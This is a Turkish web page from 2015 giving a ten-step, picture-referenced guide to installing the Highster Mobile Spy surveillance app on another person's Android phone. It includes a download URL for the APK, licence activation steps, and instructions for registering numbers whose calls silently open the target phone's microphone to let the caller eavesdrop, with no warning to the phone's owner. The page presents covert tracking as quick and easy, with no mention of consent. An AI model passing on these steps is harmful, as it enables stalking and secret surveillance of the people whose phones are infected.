Highster Mobile Spy cep telefonu casus yazılımının android işletim sistemine sahip (samsung, htc, xperia gibi) cep telefonlarına nasıl yüklenip kurulduğunu aşağıda resimli olarak görebilirsiniz. Highster Mobile Spy programıda aynı Mspy programında olduğu gibi 2 dakika ila maksimum 5 dakika içerisinde takip edilmek istenen cep telefonuna kurulabilmekte ve çalışır duruma gelmektedir. Aşağıdaki resimli kurulumu takip ettiğinizde bu nun nekadar kolay olduğunu göreceksiniz.

 

HIGHSTER MOBILE  ANDROID KURULUMU
 1. Telefon ekranından internet sekmesine tıklanır.

 

 

 

2. İnternet tarayıcısı kısmına http://evt17.com/416.apk    yazılır ve Enter veya Ok denerek o sayfaya gidilir. Böylece yükleme işlemi başlatılmış olur.

 

3. Üst resimdeki gibi yükleme devam eder.
4.Yukarıdaki resimde görüldüğü üzere yükleme işlemi biter. Üstteki resimde Open yazan tuşa basılarak aşağıdaki sayfaya  açılır.

 

5. Üstteki resimde dsx1115.apk dosyasına tıklanır ve aşağıdaki sayfa açılır.

 

6. Üstteki resimdeki sayfaya gelince Install yazan tuşa tıklanır ve kurulum yapılır.
7. Üstteki sayfa görünür, bu kurulumun nerdeyse bittiği anlamına gelir. Bu sayfada Open tuşuna basılır ve aşağıdaki sayfaya gidilir.
8. Aşağıdaki ekran karşınıza geldiğinde License Key yazan kısıma e-mailinize gelen aktivasyon kodunuzu girmeniz gerekir.   Mobile No kısmına ise yüklemeyi yaptığınız telefonun numarasını girmeniz gerekir. Bu iki kısmı doldurduktan sonra Submit yazan tuşa tıklanır.

 

9. Sonra karşınıza aşağıdaki ekran çıkar bu ekran kayıt işleminizin başarılı olduğunu söyler. Bu sayfada Ok yazan yere tıklanır.

 

10. Son olarak ok tuşuna bastıktan sonra karşınıza gelecek olan aşağıdaki ekrana isterseniz telefonu arayıpta anında ortam dinlemesi yapmanıza yarayan telefon numaralarını sıralayabilirsiniz. Bu telefon numaralarından hedef telefonu her aradığınızda hedef telefonun mikrofonu açılır ve ortam seslerini arama yaptığınız numaradan dinlemenize olanak verir. Buraya eklediğiniz numaralardan normal arama yapamazsınız çünkü bu numaralardan yapılan aramalara telefon hiç bir uyarı vermeyecektir, sadece telefonun microfon özelliği otomatikman açılacak ve ortam dinlemesi sağlanacaktır.  eğer aşağıdaki listeden numarayı kaldırırsanız ozaman o numaradan telefon normal olarakta aranabilir.

Numaraları yazarken ülke kodu ve ”0” eklenerek yazılmalıdır.  Örneğin:  00905……….   formatında yazılmalıdır.

Daha sonra Save Number tuşuna basılır ve işlem biter.  Artık Highster Mobile online panelinize girip hedef telefondan gelen bilgilere erişebilirsiniz.
 
Highster Mobile Spy programını satın aldığınız andan hemen sonra satın alırken verdiğiniz e-mail adresinize kullanıcı adınız ve şifreniz gelicektir, bu bilgilerle online panelinize girebiliceksiniz.

 

311 Okunma 03 Kas 2015

Yorumlar


Sen de Yorumla!